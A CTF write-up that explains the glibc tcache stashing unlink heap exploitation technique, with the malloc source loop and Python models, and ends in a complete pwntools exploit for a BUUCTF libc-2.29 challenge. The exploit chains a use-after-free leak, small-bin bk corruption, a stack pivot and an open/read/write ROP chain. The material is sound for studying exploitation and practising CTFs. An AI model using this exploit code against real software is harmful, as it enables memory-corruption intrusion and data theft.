tcache stashing unlink attack

Quoted from an expert's write-up:

[Original] Summary of glibc heap exploitation and IO_FILE in CTF, Pwn board, Kanxue security community (kanxue.com)

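Start with House of Lore. If we can overwrite the bk of a free chunk in a small bin so that it points to a fake chunk, and set the fake chunk's fd to point back to that free chunk so that the __glibc_unlikely (bck->fd != victim) check passes, a later allocation returns the fake chunk, which gives read and write access to an arbitrary address.
With tcache in newer libc versions this gets easier. After a chunk of the requested size has been returned from the small bin, the remaining chunks in that bin are stashed into the tcache bin, and apart from the check on the first chunk's fd pointer, this stashing performs no __glibc_unlikely (bck->fd != victim) integrity check on the doubly linked list. Since calloc() also bypasses the tcache when allocating, this leads to the tcache_stashing_unlink_attack technique, which can additionally leak libc or overwrite the value at an arbitrary address with a very large number (much like an unsorted bin attack).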

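Suppose the tcache bin already holds five chunks and the small bin of the same size holds two chunks, linked through their bk pointers as chunk_A <- chunk_B (that is, chunk_B->bk points to chunk_A).
Use the vulnerability to change chunk_A's bk to a fake chunk, and set the fake chunk's bk to target_addr - 0x10.

calloc() then bypasses the tcache bin and takes chunk_B straight from the small bin for the caller. After that, chunk_A and the fake chunk it points to are placed into the tcache bin (the only check here is whether chunk_A's fd still points to chunk_B).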

while ( tcache->counts[tc_idx] < mp_.tcache_count
    && (tc_victim = last (bin) ) != bin) // check whether the chunk taken is the bin itself (i.e. the small bin is empty)
{
 if (tc_victim != 0) // a chunk was obtained
 {
     bck = tc_victim->bk; // when tc_victim is the fake chunk, bck is the fake chunk's bk
     // set the in-use flag
     set_inuse_bit_at_offset (tc_victim, nb);
     if (av != &main_arena)
         set_non_main_arena (tc_victim);
 
     bin->bk = bck;
     bck->fd = bin; // the key write
 
     tcache_put (tc_victim, tc_idx); // move the chunk into the tcache
 }
}

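Before the fake chunk is put into the tcache bin, bck->fd = bin; is executed. Here bck is the fake chunk's bk, i.e. target_addr - 0x10, so the fd field of target_addr - 0x10, which is target_addr itself, is overwritten with a large libc-related value (the address of bin), which can then be exploited.
One more allocation then hands out the fake chunk from the tcache, giving control over it.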
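The loop and the write it performs can be modelled in a few lines of Python. This is only a toy sketch under stated assumptions: memory is a dictionary, every address (BIN, CHUNK_A, FAKE, TARGET and the five tcache entries) is a made-up value, and the model starts right after calloc() has returned chunk_B, so bin->bk already points to chunk_A.

```python
# Toy model of the small-bin stash loop quoted above.
# Memory is a dict from address to 8-byte value; all addresses are hypothetical.
FD, BK = 0x10, 0x18          # offsets of fd and bk inside a chunk
TCACHE_MAX = 7               # default value of mp_.tcache_count

def stash(mem, bin_addr, tcache):
    """Move chunks from the small bin into the tcache list.
    Like the real loop, it never checks bck->fd == victim."""
    while len(tcache) < TCACHE_MAX:
        tc_victim = mem[bin_addr + BK]        # last (bin)
        if tc_victim == bin_addr:             # small bin is empty
            break
        bck = mem[tc_victim + BK]
        mem[bin_addr + BK] = bck              # bin->bk = bck
        mem[bck + FD] = bin_addr              # bck->fd = bin (the key write)
        tcache.insert(0, tc_victim + 0x10)    # tcache stores user pointers
    return tcache

BIN, CHUNK_A, FAKE, TARGET = 0x7F0000001000, 0x5000, 0x6000, 0x9000
mem = {
    BIN + BK: CHUNK_A,          # chunk_B has already been handed out
    CHUNK_A + FD: BIN,
    CHUNK_A + BK: FAKE,         # corrupted through the vulnerability
    FAKE + BK: TARGET - 0x10,   # attacker-controlled fake chunk
}
tcache = stash(mem, BIN, [0x1000 + 0x100 * i for i in range(5)])

print(hex(mem[TARGET]))   # 0x7f0000001000, the bin address landed at TARGET
print(hex(tcache[0]))     # 0x6010, the fake chunk is first in the tcache list
```

With five entries already in the tcache the loop runs exactly twice: the first round stashes chunk_A, the second stashes the fake chunk and writes the bin address to TARGET.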

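In short, this technique accomplishes two things: gaining control of an arbitrary address and writing a large value to an arbitrary address. The two can of course also be done separately.

Gaining control of an arbitrary address target_addr: in the flow above, set chunk_A's bk directly to target_addr - 0x10, and make sure that the fd of the bk of target_addr - 0x10 is writable (in general it is enough for the bk of target_addr - 0x10, i.e. the value stored at target_addr + 8, to be a writable address).
Writing a large value to an arbitrary address target_addr: after an unsorted bin attack the list sometimes has to be repaired, and when that is hard to do, this technique achieves the same effect. In newer glibc versions, where the unsorted bin attack no longer works, it is used even more widely. In the flow above, the tcache bin must initially hold six chunks; then simply change chunk_A's bk to target_addr - 0x10.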
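Why the two variants need five versus six tcache entries can be seen by tracing the stash loop symbolically. The helper below is a hypothetical illustration (stash_trace is not a glibc or pwntools function); it assumes the default limit of 7 entries per tcache bin and a corrupted bk chain that never leads back to the bin.

```python
def stash_trace(tcache_count, limit=7):
    """List what each round of the stash loop writes and stashes,
    starting from chunk_A and following bk pointers."""
    victim = "chunk_A"
    steps = []
    while tcache_count < limit:
        bck = f"{victim}->bk"
        steps.append(f"*({bck} + 0x10) = bin; tcache_put({victim})")
        victim = bck          # the next round takes whatever bk pointed to
        tcache_count += 1
    return steps

for count in (6, 5):
    print(count, stash_trace(count))
```

With six entries there is a single round, so the only write goes to chunk_A->bk + 0x10, which is target_addr when bk is target_addr - 0x10. With five entries a second round also dereferences chunk_A->bk->bk, which is why the value at target_addr + 8 has to be a writable address in the arbitrary-allocation variant.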

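Summary: the rest of this post focuses on writing a libc address to an arbitrary address. Allocating a fake chunk works the same way, except that the tcache has to hold 5 chunks.

This raises a question: how do we end up with 6 chunks in the tcache bin and two chunks in the small bin of the same size?

The usual way to get a chunk into a small bin requires the tcache to be full, so we could allocate 9 chunks, free 7 of them into the tcache and free the other 2 so that they end up in the small bin. But calloc skips the tcache, so a subsequent add cannot take a chunk back out of the tcache, and we can never reach the state with 6 chunks left in the tcache.

Instead, we rely on unsorted bin splitting: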

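First, add 6 chunks of size_1 and free all 6 into the tcache list[size_1].
Next, add 10 chunks of size_2 (size_2 > size_1). Free chunks 3 to 9 to fill the tcache list[size_2], then free(2) into the unsorted bin, then free(0) into the unsorted bin. Chunk 1 stays allocated to keep the two unsorted bin chunks from merging.
At this point the tcache list[size_1] holds 6 chunks, the tcache list[size_2] holds 7 chunks, and the unsorted bin holds two size_2 chunks.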

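[Figure: bin state at this point]
Then add size_3 three times (size_3 = size_2 - size_1, measured in chunk sizes). Because of unsorted bin splitting, two size_1 remainders end up in small bin[size_1], which gives us 6 size_1 chunks in the tcache and two size_1 chunks in the small bin.

[Figure: bin state after the three adds]
Next, use the vulnerability to change the bk of the second-to-last chunk in small bin[size_1] to target - 0x10 (remember to restore its fd), then add size_1 once more to set target = libc_bin.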
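The relation size_3 = size_2 - size_1 holds for chunk sizes rather than request sizes. A minimal check, assuming x86-64 glibc (8-byte size field, 16-byte alignment) and taking the request sizes 0xf0, 0x400 and 0x300 from the menu of the example challenge below:

```python
SIZE_SZ = 8                # size of the chunk size field on x86-64
MALLOC_ALIGN_MASK = 0xF    # chunks are 16-byte aligned
MINSIZE = 0x20             # smallest possible chunk

def request2size(req):
    """Chunk size glibc uses for a user request of req bytes (x86-64)."""
    return max((req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK, MINSIZE)

size_1, size_2, size_3 = (request2size(r) for r in (0xF0, 0x400, 0x300))
remainder = size_2 - size_3    # what is left after splitting a size_2 chunk

print(hex(size_1), hex(size_2), hex(size_3), hex(remainder))
# 0x100 0x410 0x310 0x100
```

Splitting a 0x410 chunk for a 0x310 allocation leaves exactly a 0x100 remainder, which is the chunk size of the 0xf0 class already sitting in the tcache.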

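Example: BUUCTF [2020 新春红包题]3

First, analyze the challenge: it uses libc-2.29, and the sandbox disables execve.

add calls calloc and can only allocate chunks of four fixed sizes.

free has a UAF vulnerability.

There is also a backdoor function, magic. It only requires the value at a certain heap address to be > 0x7f000000000, which the tcache stashing unlink attack above provides, and it then performs a stack overflow. Since the overflow is only 0x10 bytes long, we pivot the stack onto the heap and run an orw (open/read/write) ROP chain there.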
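The stack pivot works because a 0x10-byte overflow covers exactly the saved rbp and the return address. The sketch below uses only the standard library; the two addresses are invented for illustration, and the 0x80-byte buffer size is taken from the exploit that follows.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian integer."""
    return struct.pack("<Q", value)

# Hypothetical addresses, for illustration only.
HEAP_ROP = 0x555555559420     # heap buffer: 8 filler bytes, then the ROP chain
LEAVE_RET = 0x7FFFF7E3B373    # address of a `leave; ret` gadget

# 0x80 bytes fill the stack buffer; the overflow sets saved rbp and the return address.
payload = b"a" * 0x80 + p64(HEAP_ROP) + p64(LEAVE_RET)

def pivot(saved_rbp):
    """Where rsp points after the gadget's `leave; ret` fetches its return address,
    given that the function epilogue already loaded saved_rbp into rbp."""
    rsp = saved_rbp    # leave: mov rsp, rbp
    rsp += 8           # leave: pop rbp consumes the first 8 bytes of the buffer
    return rsp         # ret takes the next gadget address from here

first_gadget_slot = pivot(HEAP_ROP)
print(hex(first_gadget_slot))   # 0x555555559428
```

The first 8 bytes of the heap buffer are swallowed by pop rbp, so the chain proper has to start 8 bytes into the buffer.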

Full exploit:

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r(a):
    return p.recv(a)
def ru(a):
    return p.recvuntil(a)
def debug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb(libcbase):
    return libcbase + libc.sym['system'], libcbase + next(libc.search(b'/bin/sh\x00'))


#p = remote("node5.buuoj.cn",28840)
p = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc-2.29.so')

# menu wrappers; prompts and numbers are sent as bytes
def add(idx,choose,content = b'a'):
    sla(b'Your input: ',b'1')
    sla(b'Please input the red packet idx: ',str(idx).encode())
    sla(b'How much do you want?(1.0x10 2.0xf0 3.0x300 4.0x400): ',str(choose).encode())
    sla(b'Please input content: ',content)
def free(idx):
    sla(b'Your input: ',b'2')
    sla(b'Please input the red packet idx: ',str(idx).encode())
def edit(idx,content = b'a'):
    sla(b'Your input: ',b'3')
    sla(b'Please input the red packet idx: ',str(idx).encode())
    sla(b'Please input content: ',content)
def show(idx):
    sla(b'Your input: ',b'4')
    sla(b'Please input the red packet idx: ',str(idx).encode())
def magic(data):
    sla(b'Your input: ',b'666')
    sa(b'want to say?',data)
    
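#leak libc and heap
# put 6 chunks of the 0xf0 class into its tcache bin
for i in range(6):
    add(0,2)
    free(0)

for i in range(10):
    add(i,4)   #0~9
# chunks 9..3 fill the tcache bin of the 0x400 class, chunk 2 goes to the unsorted bin
for i in range(9,1,-1):
    free(i)
free(0)        # second unsorted bin chunk; chunk 1 keeps it from merging with chunk 2
show(2)        # UAF read of an unsorted bin pointer -> libc
libc_base = get_addr() - 0x1e4ca0
success("libc_base: " + hex(libc_base))
show(3)        # UAF read of a tcache next pointer -> heap
heap_base = u64(r(6).ljust(8,b'\x00')) - 0x28b0
success("heap_base: " + hex(heap_base))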

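#tcache stashing unlink attack

# three 0x300 adds split the two freed 0x400-class chunks and leave two 0x100 remainders in the small bin
add(11,3)
add(12,3)
add(13,3)
#debug()    # uncomment to attach gdb at this point
target = heap_base + 0x260 + 0x800 - 0x10   # value for bk: address to overwrite minus 0x10
# UAF write through chunk 2: padding, the remainder's size, its original fd, the corrupted bk
edit(2,p64(1) * 0x61 + p64(0x101) + p64(heap_base + 0x1b70) + p64(target))


add(14,2)   # calloc takes from the small bin, the stash loop performs the write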

#set rop,change ret to orw
leave_ret = libc_base + 0x58373
pop_rdi = libc_base + 0x26542
pop_rsi = libc_base + 0x26f9e
pop_rdx = libc_base + 0x12bda6
pop_rax = libc_base + 0x47cf8

orw = b'./flag\x00\x00'          # file name; these 8 bytes are also consumed by the pivot's pop rbp
heap_addr = heap_base + 0x4420   # address where the orw buffer (chunk 15) is expected to land
orw+=flat(pop_rdi,heap_addr,pop_rsi,0,libc.sym['open']+libc_base)
orw+=flat(pop_rdi,3,pop_rsi,heap_addr+0x200,pop_rdx,0x50,libc.sym['read']+libc_base)
orw+=flat(pop_rdi,1,pop_rsi,heap_addr+0x200,pop_rdx,0x50,libc.sym['write']+libc_base)

add(15,4,orw)
# 0x80 bytes of padding, saved rbp -> heap_addr, return address -> leave; ret
payload = b'a' * 0x80 + p64(heap_addr) + p64(leave_ret)
magic(payload)

p.interactive()